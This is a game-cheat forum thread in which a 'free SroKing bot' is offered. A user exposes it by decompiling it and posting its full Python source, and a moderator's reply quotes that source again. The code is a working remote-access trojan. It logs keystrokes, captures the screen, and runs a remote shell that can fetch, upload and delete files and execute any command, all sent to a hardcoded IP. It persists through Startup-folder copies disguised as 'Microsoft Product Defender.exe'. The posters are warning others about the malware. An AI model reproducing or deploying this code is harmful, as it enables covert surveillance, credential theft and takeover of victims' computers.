Register for your free account! | Forgot your password?

Go Back   elitepvpers > Popular Games > Silkroad Online > SRO Hacks, Bots, Cheats & Exploits
You last visited: Today at 16:43

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Free SroKing bot is back. Download beta.

Discussion on Free SroKing bot is back. Download beta. within the SRO Hacks, Bots, Cheats & Exploits forum part of the Silkroad Online category.

Closed Thread
 
Old   #1
 
elite*gold: 0
Join Date: May 2016
Posts: 1
Received Thanks: 0
Arrow Free SroKing bot is back. Download beta.

---removed---
peceter is offline  
Old 06/18/2016, 03:31   #2


 
​Exo's Avatar
 
elite*gold: 28
Join Date: Aug 2014
Posts: 4,096
Received Thanks: 2,649
Well well well
​Exo is offline  
Thanks
1 User
Old 06/18/2016, 04:24   #3
 
elite*gold: 0
Join Date: Jan 2016
Posts: 3
Received Thanks: 1
thx bro for bot i will try it

i just try it but SroKing.exe dos not work i don't know whay
it wan't run plz help and thx
qaba55 is offline  
Old 06/18/2016, 12:21   #4
 
elite*gold: 0
Join Date: Jun 2016
Posts: 2
Received Thanks: 0
it wasn't run
husseinayman is offline  
Old 06/18/2016, 13:44   #5
 
elite*gold: 0
Join Date: Jun 2016
Posts: 2
Received Thanks: 0
PW rejected it give me this mes in hamachi
husseinayman is offline  
Old 06/18/2016, 22:58   #6
 
elite*gold: 100
Join Date: Apr 2008
Posts: 860
Received Thanks: 1,465
Code:
0025B28C  00 00 00 00 28 00 00 00 00 73 5B 00 00 00 43 3A   ••••(••••s[•••C:
0025B29C  5C 55 73 65 72 73 5C 44 61 6D 69 61 6E 5C 44 65   \Users\Damian\De
0025B2AC  73 6B 74 6F 70 5C 48 61 63 6B 53 70 79 20 54 72   sktop\HackSpy Tr
0025B2BC  6F 6A 61 6E 20 45 78 70 6C 6F 69 74 5C 64 61 74   ojan Exploit\dat
0025B2CC  61 5C 6C 69 62 5C 73 69 74 65 2D 70 61 63 6B 61   a\lib\site-packa
0025B2DC  67 65 73 5C 70 79 32 65 78 65 5C 62 6F 6F 74 5F   ges\py2exe\boot_
0025B2EC  63 6F 6D 6D 6F 6E 2E 70 79 52 0A 00 00 00 32 00   common.pyR••••2•
u sure bro?

Edit: Next level

boot_common.py
Code:
# Embedded file name: C:\Users\Damian\Desktop\HackSpy Trojan Exploit\data\lib\site-packages\py2exe\boot_common.py
import sys
if sys.frozen == 'windows_exe':

    class Stderr(object):
        softspace = 0
        _file = None
        _error = None

        def write(self, text, alert = sys._MessageBox, fname = sys.executable + '.log'):
            if self._file is None and self._error is None:
                try:
                    self._file = open(fname, 'a')
                except Exception as details:
                    self._error = details
                    import atexit
                    atexit.register(alert, 0, "The logfile '%s' could not be opened:\n %s" % (fname, details), 'Errors occurred')
                else:
                    import atexit
                    atexit.register(alert, 0, "See the logfile '%s' for details" % fname, 'Errors occurred')

            if self._file is not None:
                self._file.write(text)
                self._file.flush()
            return

        def flush(self):
            if self._file is not None:
                self._file.flush()
            return


    sys.stderr = Stderr()
    del sys._MessageBox
    del Stderr

    class Blackhole(object):
        softspace = 0

        def write(self, text):
            pass

        def flush(self):
            pass


    sys.stdout = Blackhole()
    del Blackhole
del sys
import linecache

def fake_getline(filename, lineno, module_globals = None):
    return ''


linecache.orig_getline = linecache.getline
linecache.getline = fake_getline
del linecache
del fake_getline
seq_data.py:
Code:
# Embedded file name: seq_data.py
ip = '10.0.0.3'
import pyHook, pythoncom, sys, logging
import socket
from threading import Thread
from time import sleep
import autopy
import os
import shutil
import inspect
import atexit
import multiprocessing
from multiprocessing import forking
try:
    sys.stderr = open('D:\\my_stderr.log', 'w')
except:
    pass

class _Popen(forking.Popen):

    def __init__(self, *args, **kw):
        if hasattr(sys, 'frozen'):
            os.putenv('_MEIPASS2', sys._MEIPASS)
        try:
            super(_Popen, self).__init__(*args, **kw)
        finally:
            if hasattr(sys, 'frozen'):
                os.unsetenv('_MEIPASS2')


class Process(multiprocessing.Process):
    _Popen = _Popen


def if_startup():
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    loop = 'on'
    while loop == 'on':
        try:
            sleep(1)
            server.connect((ip, 8081))
            loop = 'off'
        except:
            pass

    def back_dir(current_path):
        c = current_path.split('\\')
        new_path = ''
        i = 0
        while i < len(c) - 1:
            if i != 0:
                new_path = new_path + '\\' + c[i]
            else:
                new_path = c[i]
            i += 1

        os.chdir(new_path)

    def attack1():
        server1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop1 = 'on'
        while loop1 == 'on':
            try:
                sleep(1)
                server1.connect((ip, 10000))
                loop1 = 'off'
            except:
                pass

        def OnKeyboardEvent(event):
            k = chr(event.Ascii)
            server1.send(k)
            return None

        hooks_manager = pyHook.HookManager()
        hooks_manager.KeyDown = OnKeyboardEvent
        hooks_manager.HookKeyboard()
        pythoncom.PumpMessages()

    def attack2():
        server3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop3 = 'on'
        while loop3 == 'on':
            try:
                sleep(1)
                server3.connect((ip, 4444))
                loop3 = 'off'
            except:
                pass

            time_interval = 3
            try:
                time_interval = server3.recv(1024)
            except:
                pass

            while True:
                sleep(float(time_interval))
                bitmap = autopy.bitmap.capture_screen()
                bitmap.save('1.png')
                with open('1.png', 'rb') as f:
                    bytes_to_send = f.read(1024)
                    server3.send(bytes_to_send)
                    while bytes_to_send != '':
                        bytes_to_send = f.read(1024)
                        if bytes_to_send == '':
                            server3.send('stop it')
                        else:
                            server3.send(bytes_to_send)

    def attack3():
        server4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop4 = 'on'
        while loop4 == 'on':
            try:
                sleep(1)
                server4.connect((ip, 10008))
                loop4 = 'off'
            except:
                pass

        while True:
            command = server4.recv(1024)
            if command == 'cd..':
                try:
                    back_dir(os.getcwd())
                except:
                    pass

            elif command[:3] == 'cd ':
                try:
                    os.chdir(command[3:])
                except:
                    pass

            elif command == 'ls':
                data = os.listdir(os.getcwd())
                i = 0
                d = ''
                while i < len(data):
                    d = d + '$$%%' + data[i]
                    i += 1

                server4.send(d)
            elif command[:4] == 'get ':
                f = open(command[4:], 'rb')
                size = os.path.getsize(command[4:])
                server4.send(str(size))
                data = f.read(2048)
                server4.send(data)
                while data != '':
                    data = ''
                    data = f.read(2048)
                    if data == '':
                        server4.send('stop it')
                    else:
                        server4.send(data)

            elif command[:6] == 'mkdir ':
                os.mkdir(command[6:])
            elif command[:7] == 'upload ':
                size = server4.recv(1024)
                data = server4.recv(2048)
                while data[-7:] != 'stop it':
                    f = open(command[7:], 'ab')
                    f.write(data)
                    f.close()
                    data = ''
                    data = server4.recv(2048)

            elif command == 'pwd':
                path = os.getcwd()
                server4.send(path)
            elif command[:5] == 'del_d':
                try:
                    os.rmtree(command[6:])
                except:
                    pass

            elif command[:5] == 'del_f':
                try:
                    os.remove(command[6:])
                except:
                    pass

            elif command == 'shutdown':
                os.system('shutdown -s')
            elif command[:4] == 'cmd ':
                try:
                    print command[4:]
                    os.system(command[4:])
                except:
                    pass

    count = 0
    server2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server6 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    while True:
        if count == 1:
            loop0 = 'on'
            while loop0 == 'on':
                try:
                    sleep(1)
                    server2.connect((ip, 8081))
                    option = server2.recv(1024)
                    loop0 = 'off'
                except:
                    pass

            count = 2
        elif count == 0:
            option = server.recv(1024)
            count = 1
        elif count == 2:
            loop6 = 'on'
            while loop6 == 'on':
                try:
                    print 'done'
                    sleep(1)
                    server6.connect((ip, 8081))
                    option = server6.recv(1024)
                    loop6 = 'off'
                except:
                    pass

            count = 1
        if option == '1':
            t = Thread(target=attack1)
            t.start()
        elif option == '2':
            t = Thread(target=attack2)
            t.start()
        elif option == '3':
            t = Thread(target=attack3)
            t.start()


if os.getcwd()[-7:] == 'Startup':
    atexit.register(if_startup)
else:
    try:
        s = os.getcwd()
        fi = inspect.stack()[0][1]
        present_file = fi.split('/')
        source = str(s) + '\\' + present_file[-1][:-2] + 'exe'
        dest = 'Microsoft Product Defender.exe'
        os.chdir('C:\\Users')
        hostlist = os.listdir('.')
        for i in hostlist:
            try:
                os.chdir('C:\\Users\\' + str(i) + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup')
                shutil.copy2(source, dest)
                f = open('windows.bat', 'w')
                f.write('@echo off\n')
                f.write('"Microsoft Product Defender.exe"')
                f.close()
            except:
                pass

    except:
        pass

    atexit.register(if_startup)
Wooaaah. It has some screen capture things. Think i gotta stream some *weird* "things".

Edit 2: IP is 10.0.0.3. I thought that hamachi was a troll but the "hacker" is definitily too stupid to make a port forwarding
florian0 is offline  
Thanks
4 Users
Old 06/18/2016, 23:35   #7
Chat Killer In Duty


 
PortalDark's Avatar
 
elite*gold: 5
Join Date: May 2008
Posts: 16,309
Received Thanks: 6,470
Quote:
Originally Posted by florian0 View Post
Code:
0025B28C  00 00 00 00 28 00 00 00 00 73 5B 00 00 00 43 3A   ••••(••••s[•••C:
0025B29C  5C 55 73 65 72 73 5C 44 61 6D 69 61 6E 5C 44 65   \Users\Damian\De
0025B2AC  73 6B 74 6F 70 5C 48 61 63 6B 53 70 79 20 54 72   sktop\HackSpy Tr
0025B2BC  6F 6A 61 6E 20 45 78 70 6C 6F 69 74 5C 64 61 74   ojan Exploit\dat
0025B2CC  61 5C 6C 69 62 5C 73 69 74 65 2D 70 61 63 6B 61   a\lib\site-packa
0025B2DC  67 65 73 5C 70 79 32 65 78 65 5C 62 6F 6F 74 5F   ges\py2exe\boot_
0025B2EC  63 6F 6D 6D 6F 6E 2E 70 79 52 0A 00 00 00 32 00   common.pyR••••2•
u sure bro?

Edit: Next level

boot_common.py
Code:
# Embedded file name: C:\Users\Damian\Desktop\HackSpy Trojan Exploit\data\lib\site-packages\py2exe\boot_common.py
import sys
if sys.frozen == 'windows_exe':

    class Stderr(object):
        softspace = 0
        _file = None
        _error = None

        def write(self, text, alert = sys._MessageBox, fname = sys.executable + '.log'):
            if self._file is None and self._error is None:
                try:
                    self._file = open(fname, 'a')
                except Exception as details:
                    self._error = details
                    import atexit
                    atexit.register(alert, 0, "The logfile '%s' could not be opened:\n %s" % (fname, details), 'Errors occurred')
                else:
                    import atexit
                    atexit.register(alert, 0, "See the logfile '%s' for details" % fname, 'Errors occurred')

            if self._file is not None:
                self._file.write(text)
                self._file.flush()
            return

        def flush(self):
            if self._file is not None:
                self._file.flush()
            return


    sys.stderr = Stderr()
    del sys._MessageBox
    del Stderr

    class Blackhole(object):
        softspace = 0

        def write(self, text):
            pass

        def flush(self):
            pass


    sys.stdout = Blackhole()
    del Blackhole
del sys
import linecache

def fake_getline(filename, lineno, module_globals = None):
    return ''


linecache.orig_getline = linecache.getline
linecache.getline = fake_getline
del linecache
del fake_getline
seq_data.py:
Code:
# Embedded file name: seq_data.py
ip = '10.0.0.3'
import pyHook, pythoncom, sys, logging
import socket
from threading import Thread
from time import sleep
import autopy
import os
import shutil
import inspect
import atexit
import multiprocessing
from multiprocessing import forking
try:
    sys.stderr = open('D:\\my_stderr.log', 'w')
except:
    pass

class _Popen(forking.Popen):

    def __init__(self, *args, **kw):
        if hasattr(sys, 'frozen'):
            os.putenv('_MEIPASS2', sys._MEIPASS)
        try:
            super(_Popen, self).__init__(*args, **kw)
        finally:
            if hasattr(sys, 'frozen'):
                os.unsetenv('_MEIPASS2')


class Process(multiprocessing.Process):
    _Popen = _Popen


def if_startup():
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    loop = 'on'
    while loop == 'on':
        try:
            sleep(1)
            server.connect((ip, 8081))
            loop = 'off'
        except:
            pass

    def back_dir(current_path):
        c = current_path.split('\\')
        new_path = ''
        i = 0
        while i < len(c) - 1:
            if i != 0:
                new_path = new_path + '\\' + c[i]
            else:
                new_path = c[i]
            i += 1

        os.chdir(new_path)

    def attack1():
        server1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop1 = 'on'
        while loop1 == 'on':
            try:
                sleep(1)
                server1.connect((ip, 10000))
                loop1 = 'off'
            except:
                pass

        def OnKeyboardEvent(event):
            k = chr(event.Ascii)
            server1.send(k)
            return None

        hooks_manager = pyHook.HookManager()
        hooks_manager.KeyDown = OnKeyboardEvent
        hooks_manager.HookKeyboard()
        pythoncom.PumpMessages()

    def attack2():
        server3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop3 = 'on'
        while loop3 == 'on':
            try:
                sleep(1)
                server3.connect((ip, 4444))
                loop3 = 'off'
            except:
                pass

            time_interval = 3
            try:
                time_interval = server3.recv(1024)
            except:
                pass

            while True:
                sleep(float(time_interval))
                bitmap = autopy.bitmap.capture_screen()
                bitmap.save('1.png')
                with open('1.png', 'rb') as f:
                    bytes_to_send = f.read(1024)
                    server3.send(bytes_to_send)
                    while bytes_to_send != '':
                        bytes_to_send = f.read(1024)
                        if bytes_to_send == '':
                            server3.send('stop it')
                        else:
                            server3.send(bytes_to_send)

    def attack3():
        server4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop4 = 'on'
        while loop4 == 'on':
            try:
                sleep(1)
                server4.connect((ip, 10008))
                loop4 = 'off'
            except:
                pass

        while True:
            command = server4.recv(1024)
            if command == 'cd..':
                try:
                    back_dir(os.getcwd())
                except:
                    pass

            elif command[:3] == 'cd ':
                try:
                    os.chdir(command[3:])
                except:
                    pass

            elif command == 'ls':
                data = os.listdir(os.getcwd())
                i = 0
                d = ''
                while i < len(data):
                    d = d + '$$%%' + data[i]
                    i += 1

                server4.send(d)
            elif command[:4] == 'get ':
                f = open(command[4:], 'rb')
                size = os.path.getsize(command[4:])
                server4.send(str(size))
                data = f.read(2048)
                server4.send(data)
                while data != '':
                    data = ''
                    data = f.read(2048)
                    if data == '':
                        server4.send('stop it')
                    else:
                        server4.send(data)

            elif command[:6] == 'mkdir ':
                os.mkdir(command[6:])
            elif command[:7] == 'upload ':
                size = server4.recv(1024)
                data = server4.recv(2048)
                while data[-7:] != 'stop it':
                    f = open(command[7:], 'ab')
                    f.write(data)
                    f.close()
                    data = ''
                    data = server4.recv(2048)

            elif command == 'pwd':
                path = os.getcwd()
                server4.send(path)
            elif command[:5] == 'del_d':
                try:
                    os.rmtree(command[6:])
                except:
                    pass

            elif command[:5] == 'del_f':
                try:
                    os.remove(command[6:])
                except:
                    pass

            elif command == 'shutdown':
                os.system('shutdown -s')
            elif command[:4] == 'cmd ':
                try:
                    print command[4:]
                    os.system(command[4:])
                except:
                    pass

    count = 0
    server2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server6 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    while True:
        if count == 1:
            loop0 = 'on'
            while loop0 == 'on':
                try:
                    sleep(1)
                    server2.connect((ip, 8081))
                    option = server2.recv(1024)
                    loop0 = 'off'
                except:
                    pass

            count = 2
        elif count == 0:
            option = server.recv(1024)
            count = 1
        elif count == 2:
            loop6 = 'on'
            while loop6 == 'on':
                try:
                    print 'done'
                    sleep(1)
                    server6.connect((ip, 8081))
                    option = server6.recv(1024)
                    loop6 = 'off'
                except:
                    pass

            count = 1
        if option == '1':
            t = Thread(target=attack1)
            t.start()
        elif option == '2':
            t = Thread(target=attack2)
            t.start()
        elif option == '3':
            t = Thread(target=attack3)
            t.start()


if os.getcwd()[-7:] == 'Startup':
    atexit.register(if_startup)
else:
    try:
        s = os.getcwd()
        fi = inspect.stack()[0][1]
        present_file = fi.split('/')
        source = str(s) + '\\' + present_file[-1][:-2] + 'exe'
        dest = 'Microsoft Product Defender.exe'
        os.chdir('C:\\Users')
        hostlist = os.listdir('.')
        for i in hostlist:
            try:
                os.chdir('C:\\Users\\' + str(i) + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup')
                shutil.copy2(source, dest)
                f = open('windows.bat', 'w')
                f.write('@echo off\n')
                f.write('"Microsoft Product Defender.exe"')
                f.close()
            except:
                pass

    except:
        pass

    atexit.register(if_startup)
Wooaaah. It has some screen capture things. Think i gotta stream some *weird* "things".

Edit 2: IP is 10.0.0.3. I thought that hamachi was a troll but the "hacker" is definitily too stupid to make a port forwarding
Thank you

#closed

#content removed
PortalDark is offline  
Closed Thread


Similar Threads Similar Threads
Black Ops 2 Beta Keys 4 Free no Download!!!
06/05/2012 - Trading - 6 Replies
No Download . Just an Online Key Generator for all 3 Plattforms!!! :D Black Ops 2 Beta Keys 4 Free



All times are GMT +2. The time now is 16:43.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.